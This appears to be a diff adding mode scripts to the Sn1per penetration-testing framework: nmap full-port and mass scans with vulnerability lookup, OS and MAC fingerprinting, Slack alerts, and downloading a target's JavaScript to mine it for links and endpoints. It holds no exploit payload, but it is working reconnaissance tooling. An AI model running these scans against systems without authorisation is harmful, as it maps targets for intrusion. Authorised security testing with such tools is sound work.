ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt 2> /dev/null
RUNNING_TASKS=$(wc -l $LOOT_DIR/scans/tasks-running.txt 2> /dev/null)
i=$((i+1))
if [[ "$i" -gt "$FLYOVER_MAX_HOSTS" ]]; then
i=1
sleep $FLYOVER_DELAY
fi
done
sleep $FLYOVER_DELAY
sort -u LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
sort -u $LOOT_DIR/domains/targets-all-presorted.txt 2> /dev/null > $LOOT_DIR/domains/targets-all-sorted.txt
rm -f $INSTALL_DIR/wget-log* 2> /dev/null
killall webtech 2> /dev/null
rm -f $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null
for TARGET in `cat $LOOT_DIR/domains/targets-all-sorted.txt`; do
HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null | grep "host up" 2> /dev/null)
if [[ ${#HOST_UP} -ge 2 ]]; then
echo "$TARGET" >> $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null
fi
for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do
echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt
done
cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2>/dev/null | egrep "MAC Address:" | awk '{print $3 " " $4 " " $5 " " $6}' > $LOOT_DIR/nmap/macaddress-$TARGET.txt 2> /dev/null
cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt $LOOT_DIR/output/nmap-$TARGET-*.txt 2>/dev/null | egrep "OS details:|OS guesses:" | cut -d\: -f2 | sed 's/,//g' | head -c50 - > $LOOT_DIR/nmap/osfingerprint-$TARGET.txt 2> /dev/null
diff $LOOT_DIR/nmap/ports-$TARGET.old $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null > $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null
done
sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null
diff $LOOT_DIR/nmap/livehosts-sorted.old $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.diff 2> /dev/null
if [[ -s "$LOOT_DIR/nmap/livehosts-sorted.diff" ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Host status change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/nmap/livehosts-sorted.diff | egrep "<|>" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Host status change detected on $WORKSPACE (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/livehosts-sorted.diff"
fi
fi
for a in `cat $LOOT_DIR/domains/targets-all-sorted.txt 2> /dev/null`
do
diff $LOOT_DIR/nmap/ports-$a.old $LOOT_DIR/nmap/ports-$a.txt 2> /dev/null > $LOOT_DIR/nmap/ports-$a.diff 2> /dev/null
if [[ -s "$LOOT_DIR/nmap/ports-$a.diff" ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Port change detected on $a (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/nmap/ports-$a.diff | egrep "<|>" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Port change detected on $a (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$a.diff"
fi
fi
done
sed -i -E 's/,//g' $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
rm -f $LOOT_DIR/scans/running_${WORKSPACE}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $FILE [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $FILE [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$LOOT" = "1" ]]; then
loot
fi
fi
exit
fi

112
modes/fullportonly.sh Normal file
View File

@@ -0,0 +1,112 @@
# FULLPORTONLY MODE
if [[ "$MODE" = "fullportonly" ]]; then
if [[ "$REPORT" = "1" ]]; then
args="-t $TARGET"
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/domains 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/scans 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
fi
args="$args --noreport -m fullportonly"
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport " >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
logo
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
if [[ -f "/usr/share/sniper/pro/.portscanner.conf" ]]; then
source /usr/share/sniper/pro/.portscanner.conf
fi
if [[ -z "$PORT" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nmap $NMAP_OPTIONS -sU -sS --script=/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
else
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nmap $NMAP_OPTIONS -sU -sS --script=/usr/share/nmap/scripts/vulners -p $PORT -oX $LOOT_DIR/nmap/nmap-$TARGET-tcp-port$PORT.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
fi
cp -f $LOOT_DIR/nmap/nmapreport-$TARGET.html $LOOT_DIR/nmap/nmapreport-$TARGET-`date +"%Y-%m-%d-%H-%M"`.html 2> /dev/null
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2> /dev/null | grep "host up" 2> /dev/null)
if [[ ${#HOST_UP} -ge 2 ]]; then
echo "$TARGET" >> $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null
fi
sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null
mv -f $LOOT_DIR/nmap/ports-$TARGET.txt $LOOT_DIR/nmap/ports-$TARGET.old 2> /dev/null
for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do
echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt
done
diff $LOOT_DIR/nmap/ports-$TARGET.old $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null > $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null
cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2>/dev/null | egrep "MAC Address:" | awk '{print $3 " " $4 " " $5 " " $6}' > $LOOT_DIR/nmap/macaddress-$TARGET.txt 2> /dev/null
cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt $LOOT_DIR/output/nmap-$TARGET-*.txt 2>/dev/null | egrep "OS details:|OS guesses:" | cut -d\: -f2 | sed 's/,//g' | head -c50 - > $LOOT_DIR/nmap/osfingerprint-$TARGET.txt 2> /dev/null
if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt"
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt"
fi
if [[ -s "$LOOT_DIR/nmap/ports-$TARGET.diff" ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null | egrep "<|>" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$TARGET.diff"
fi
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SC0PE PASSIVE WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
SSL="false"
PORT="80"
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
SSL="true"
PORT="443"
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
source $file
done
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
source $INSTALL_DIR/modes/sc0pe.sh
fi
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SCAN COMPLETE! $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
loot
exit
fi
if [[ "$MODE" = "port" ]]; then
if [[ -z "$PORT" ]]; then
echo -e "$OKRED + -- --=[Error: You need to enter a port number. $RESET"
exit
fi
fi

54
modes/fullportscan.sh Normal file
View File

@@ -0,0 +1,54 @@
if [[ "$FULLNMAPSCAN" = "0" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SKIPPING FULL NMAP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
else
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
mv -f $LOOT_DIR/nmap/ports-$TARGET.txt $LOOT_DIR/nmap/ports-$TARGET.old 2> /dev/null
nmap $NMAP_OPTIONS -sU -sS --script=/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
cp -f $LOOT_DIR/nmap/nmapreport-$TARGET.html $LOOT_DIR/nmap/nmapreport-$TARGET-`date +"%Y-%m-%d-%H-%M"`.html 2> /dev/null
if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt"
fi
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2> /dev/null | grep "host up" 2> /dev/null)
if [[ ${#HOST_UP} -ge 2 ]]; then
echo "$TARGET" >> $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null
fi
sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null
for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do
echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt
done
diff $LOOT_DIR/nmap/ports-$TARGET.old $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null > $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null
cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2>/dev/null | egrep "MAC Address:" | awk '{print $3 " " $4 " " $5 " " $6}' > $LOOT_DIR/nmap/macaddress-$TARGET.txt 2> /dev/null
cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt $LOOT_DIR/output/nmap-$TARGET-*.txt 2>/dev/null | egrep "OS details:|OS guesses:" | cut -d\: -f2 | sed 's/,//g' | head -c50 - > $LOOT_DIR/nmap/osfingerprint-$TARGET.txt 2> /dev/null
if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt"
fi
if [[ -s "$LOOT_DIR/nmap/ports-$TARGET.diff" ]]; then
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$TARGET.diff"
fi
echo "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/nmap/ports-$TARGET.diff | egrep "<|>" >> $LOOT_DIR/scans/notifications_new.txt
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
fi

36
modes/javascript-analysis.sh Normal file
View File

@@ -0,0 +1,36 @@
mkdir -p $LOOT_DIR/web/javascript/$TARGET 2> /dev/null
cd $LOOT_DIR/web/javascript/$TARGET
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DOWNLOADING ALL JAVASCRIPT FILES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
egrep --binary-files=text "\.js" $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp'
for a in `egrep --binary-files=text "\.js" $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - $a" && FILENAME=$(echo "$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done;
for a in `egrep --binary-files=text "\.js" $LOOT_DIR/web/weblinks-htt*-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp' | egrep -i 'http' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - $a" && FILENAME=$(echo "$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done;
for a in `egrep --binary-files=text "\.js" $LOOT_DIR/web/weblinks-htt*-$TARGET.txt 2> /dev/null | egrep -v '.json|.jsp' | egrep -iv 'http' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - https://$a" && FILENAME=$(echo "https://$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done;
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING ALL JAVASCRIPT COMMENTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/javascript/$TARGET/*.js 2> /dev/null | egrep "\/\/|\/\*" | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-comments.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING ALL JAVASCRIPT LINKS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/javascript/$TARGET/*.js 2> /dev/null | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-urls.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING LINKFINDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cd $PLUGINS_DIR/LinkFinder/
for a in `ls $LOOT_DIR/web/javascript/$TARGET/*.js 2> /dev/null`; do echo "Analyzing - $a" && FILENAME=$(echo "$a" | awk -F/ '{print $(NF-0)}') && python3 linkfinder.py -d -i $a -o cli 2> /dev/null | egrep -v "application\/|SSL error" > $LOOT_DIR/web/javascript-linkfinder-$TARGET-$FILENAME.txt 2> /dev/null; done;
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING PATH RELATIVE LINKS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/javascript-linkfinder-$TARGET-*.txt 2> /dev/null | grep -v "Running " | awk '{print $1}' | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-path-relative.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING JAVASCRIPT URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep -h http $LOOT_DIR/web/javascript-linkfinder-$TARGET-*.txt 2> /dev/null | grep -v "Running " | awk '{print $1}' | egrep "http\:\/\/|https\:\/\/" | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-linkfinder-urls.txt
sort -u $LOOT_DIR/web/javascript-$TARGET-urls.txt $LOOT_DIR/web/javascript-$TARGET-linkfinder-urls.txt 2> /dev/null > $LOOT_DIR/web/javascript-$TARGET-urls-sorted.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED DISPLAYING JAVASCRIPT DOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep -h http $LOOT_DIR/web/javascript-linkfinder-$TARGET-*.txt 2> /dev/null | grep -v "Running " | awk '{print $1}' | egrep "http\:\/\/|https\:\/\/" | cut -d\/ -f3 | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-domains.txt
WEB_JAVASCRIPT_ANALYSIS="0"

73
modes/massportscan.sh Normal file
View File

@@ -0,0 +1,73 @@
# MASSWEB MODE #####################################################################################################
if [[ "$MODE" = "massportscan" ]]; then
if [[ -z "$FILE" ]]; then
logo
echo "You need to specify a list of targets (ie. -f <targets.txt>) to scan."
exit
fi
if [[ "$REPORT" = "1" ]]; then
for a in `cat $FILE`;
do
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $WORKSPACE_DIR 2> /dev/null
mkdir $WORKSPACE_DIR/domains 2> /dev/null
mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
mkdir $WORKSPACE_DIR/nmap 2> /dev/null
mkdir $WORKSPACE_DIR/notes 2> /dev/null
mkdir $WORKSPACE_DIR/reports 2> /dev/null
mkdir $WORKSPACE_DIR/output 2> /dev/null
fi
args="$args -m fullportonly --noreport --noloot"
TARGET="$a"
args="$args -t $TARGET"
echo -e "$OKRED |"
echo -e "$OKRED | |"
echo -e "$OKRED | -/_\-"
echo -e "$OKRED -/_\- ______________(/ . \)______________"
echo -e "$OKRED ____________(/ . \)_____________ \___/ <>"
echo -e "$OKRED <> \___/ <> <>"
echo -e "$OKRED "
echo -e "$OKRED ||"
echo -e "$OKRED <>"
echo -e "$OKRED ||"
echo -e "$OKRED <>"
echo -e "$OKRED ||"
echo -e "$OKRED || BIG"
echo -e "$OKRED _____ __ <> (^)))^ BOOM!"
echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )"
echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )"
echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)"
echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
echo -e "$OKRED | ||. | | | ||| |||||"
echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
echo -e "$OKRED | ||. | | | ||| |||||"
echo -e "$OKRED __________________________________________________________"
echo -e "$RESET"
if [[ ! -z "$WORKSPACE_DIR" ]]; then
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
else
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
fi
args=""
done
fi
